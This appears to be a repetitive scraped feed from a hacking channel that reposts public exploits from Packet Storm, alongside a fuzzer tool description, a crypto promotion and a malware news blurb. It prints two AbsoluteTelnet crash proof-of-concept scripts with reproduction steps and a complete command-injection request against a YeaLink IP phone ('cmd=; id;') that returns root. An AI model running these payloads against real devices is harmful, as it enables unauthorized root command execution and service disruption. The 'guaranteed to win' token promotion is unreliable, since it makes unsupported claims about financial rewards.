Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
The WSAQuerySocketSecurity API returns full anonymous impersonation tokens for connected peers in an AppContainer leading to a sandbox escape.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
The WSAQuerySocketSecurity API returns full anonymous impersonation tokens for connected peers in an AppContainer leading to a sandbox escape.
MD5 |
ade1ded7ab08f8d11cd681665642d7eaDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Apache HTTP Server 2.4.50 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Apache HTTP Server 2.4.50 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache HTTP Server 2.4.50 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
AbsoluteTelnet 11.24 Denial Of Service
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
AbsoluteTelnet version 11.24 suffers from multiple denial of service vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
AbsoluteTelnet 11.24 Denial Of Service
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
AbsoluteTelnet version 11.24 suffers from multiple denial of service vulnerabilities.
MD5 |
c4916606f4a527de1d97ff6c1c0f4553Download
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "new connection file -> DialUp Connection
# 5. - Paste the characters of txt file to "DialUp -> phone"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters to "license name"
# 10.- Click "Send Error Report" button
# 11.- Crashed
#!/usr/bin/python
exploit = 'A' * 1000
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
------
# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "new connection file -> Connection -> SSH1 & SSH2"
# 5. - Paste the characters of txt file to "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters to "Your Email Address (optional)"
# 10.- Click "Send Error Report" button
# 11.- Crashed
#!/usr/bin/python
exploit = 'A' * 1000
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
AbsoluteTelnet 11.24 Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
YeaLink SIP-TXXXP 53.84.0.15 Command Injection
https://2.bp.blogspot.com/-x_QP5QrO-tY/WWlvkxoh72I/AAAAAAAAIQ4/t-2dHNJyeE0-qZNxsCg7sgdho_ipgPgbgCLcBGAs/s1600/h98.png
YeaLink SIP-TXXXP version 53.84.0.15 suffers from a remote command injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
YeaLink SIP-TXXXP 53.84.0.15 Command Injection
https://2.bp.blogspot.com/-x_QP5QrO-tY/WWlvkxoh72I/AAAAAAAAIQ4/t-2dHNJyeE0-qZNxsCg7sgdho_ipgPgbgCLcBGAs/s1600/h98.png
YeaLink SIP-TXXXP version 53.84.0.15 suffers from a remote command injection vulnerability.
MD5 |
46ce1eaaaffb2dd76050853790c11dd6Download
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
Description:
Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
POC:
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close
cmd=; id;&token=1714636915c6acea98
-------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82
uid=0(root) gid=0(root)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
YeaLink SIP-TXXXP 53.84.0.15 Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Boofuzz - Network Protocol Fuzzing for Humans
http://www.kitploit.com/2021/11/boofuzz-network-protocol-fuzzing-for.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/11/boofuzz-network-protocol-fuzzing-for.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Boofuzz is a fork of and the successor to the venerable Sulley (https://github.com/OpenRCE/sulley) fuzzing framework. Besides numerous bug fixes, boofuzz aims for extensibility. The goal: fuzz (https://www.kitploit.com/search/label/Fuzz) everything.
Why?
Sulley has been the preeminent open source fuzzer (https://www.kitploit.com/search/label/Fuzzer) for some time, but has fallen out of maintenance.
Features
Like Sulley, boofuzz incorporates all the critical elements of a fuzzer:Easy and quick data generation.Instrumentation – AKA failure detection.Target reset after failure.Recording of test data.Unlike Sulley, boofuzz also features:Online documentation (https://boofuzz.readthedocs.io/).Support for arbitrary communications mediums.Built-in support for serial fuzzing, ethernet- and IP-layer, UDP broadcast.Better recording of test data -- consistent, thorough, clear.Test result CSV export.Extensible instrumentation/failure detection.Much easier install experience!Far fewer bugs.Sulley is affectionately named after the giant teal and purple creature from Monsters Inc. due to his fuzziness. Boofuzz is likewise named after the only creature known to have scared Sulley himself: Boo!
___________________________
@hacking_Attack
@Hacking_Video
Why?
Sulley has been the preeminent open source fuzzer (https://www.kitploit.com/search/label/Fuzzer) for some time, but has fallen out of maintenance.
Features
Like Sulley, boofuzz incorporates all the critical elements of a fuzzer:Easy and quick data generation.Instrumentation – AKA failure detection.Target reset after failure.Recording of test data.Unlike Sulley, boofuzz also features:Online documentation (https://boofuzz.readthedocs.io/).Support for arbitrary communications mediums.Built-in support for serial fuzzing, ethernet- and IP-layer, UDP broadcast.Better recording of test data -- consistent, thorough, clear.Test result CSV export.Extensible instrumentation/failure detection.Much easier install experience!Far fewer bugs.Sulley is affectionately named after the giant teal and purple creature from Monsters Inc. due to his fuzziness. Boofuzz is likewise named after the only creature known to have scared Sulley himself: Boo!
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - OpenRCE/sulley: A pure-python fully automated and unattended fuzzing framework.
A pure-python fully automated and unattended fuzzing framework. - OpenRCE/sulley
Boo from Monsters Inc
Installation
pip install boofuzz
Boofuzz installs as a Python library (https://www.kitploit.com/search/label/Library) used to build fuzzer scripts. See INSTALL.rst (https://github.com/jtpereyda/boofuzz/blob/master/INSTALL.rst) for advanced and detailed instructions.
Documentation
Documentation is available at https://boofuzz.readthedocs.io/, including nifty quickstart guides.
Contributions
Pull requests are welcome, as boofuzz is actively maintained (at the time of this writing ;)). See CONTRIBUTING.rst (https://github.com/jtpereyda/boofuzz/blob/master/CONTRIBUTING.rst).
Community
For questions that take the form of “How do I… with boofuzz?” or “I got this error with boofuzz, why?”, consider posting your question on Stack Overflow. Make sure to use the fuzzing tag.If you’ve found a bug, or have an idea/suggestion/request, file an issue here on GitHub.For other questions, check out boofuzz on gitter (https://gitter.im/jtpereyda/boofuzz) or Google Groups (https://groups.google.com/d/forum/boofuzz).For updates, follow @b00fuzz (https://twitter.com/b00fuzz) on Twitter.
Download Boofuzz (https://github.com/jtpereyda/boofuzz)
___________________________
@hacking_Attack
@Hacking_Video
Installation
pip install boofuzz
Boofuzz installs as a Python library (https://www.kitploit.com/search/label/Library) used to build fuzzer scripts. See INSTALL.rst (https://github.com/jtpereyda/boofuzz/blob/master/INSTALL.rst) for advanced and detailed instructions.
Documentation
Documentation is available at https://boofuzz.readthedocs.io/, including nifty quickstart guides.
Contributions
Pull requests are welcome, as boofuzz is actively maintained (at the time of this writing ;)). See CONTRIBUTING.rst (https://github.com/jtpereyda/boofuzz/blob/master/CONTRIBUTING.rst).
Community
For questions that take the form of “How do I… with boofuzz?” or “I got this error with boofuzz, why?”, consider posting your question on Stack Overflow. Make sure to use the fuzzing tag.If you’ve found a bug, or have an idea/suggestion/request, file an issue here on GitHub.For other questions, check out boofuzz on gitter (https://gitter.im/jtpereyda/boofuzz) or Google Groups (https://groups.google.com/d/forum/boofuzz).For updates, follow @b00fuzz (https://twitter.com/b00fuzz) on Twitter.
Download Boofuzz (https://github.com/jtpereyda/boofuzz)
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Earn $AMPT while Discovering Decentralised Governance
https://blog.ampt.finance/earn-ampt-while-discovering-decentralised-governance-4e32ef9907fd?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://blog.ampt.finance/earn-ampt-while-discovering-decentralised-governance-4e32ef9907fd?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Earn $AMPT while Discovering Decentralised Governance
Guaranteed to WIN! $70K+ In Total Rewards!!
Guaranteed to WIN! $70K+ In Total Rewards!!Continue reading on Amplify Protocol » (https://blog.ampt.finance/earn-ampt-while-discovering-decentralised-governance-4e32ef9907fd?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Earn $AMPT while Discovering Decentralised Governance
Guaranteed to WIN! $70K+ In Total Rewards!!
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The malware called PhoneSpy invades the privacy of Android users.
https://cdn-images-1.medium.com/max/1024/1*qxFZ7fu-IYdm-st5cZMwaA.jpeg
Android users should be aware of some new viruses. PhoneSpy is the name of the malware, and Zimperium claims that its zLabs research team…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The malware called PhoneSpy invades the privacy of Android users.
https://cdn-images-1.medium.com/max/1024/1*qxFZ7fu-IYdm-st5cZMwaA.jpeg
Android users should be aware of some new viruses. PhoneSpy is the name of the malware, and Zimperium claims that its zLabs research team…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The malware called PhoneSpy invades the privacy of Android users.
Android users should be aware of some new viruses. PhoneSpy is the name of the malware, and Zimperium claims that its zLabs research team…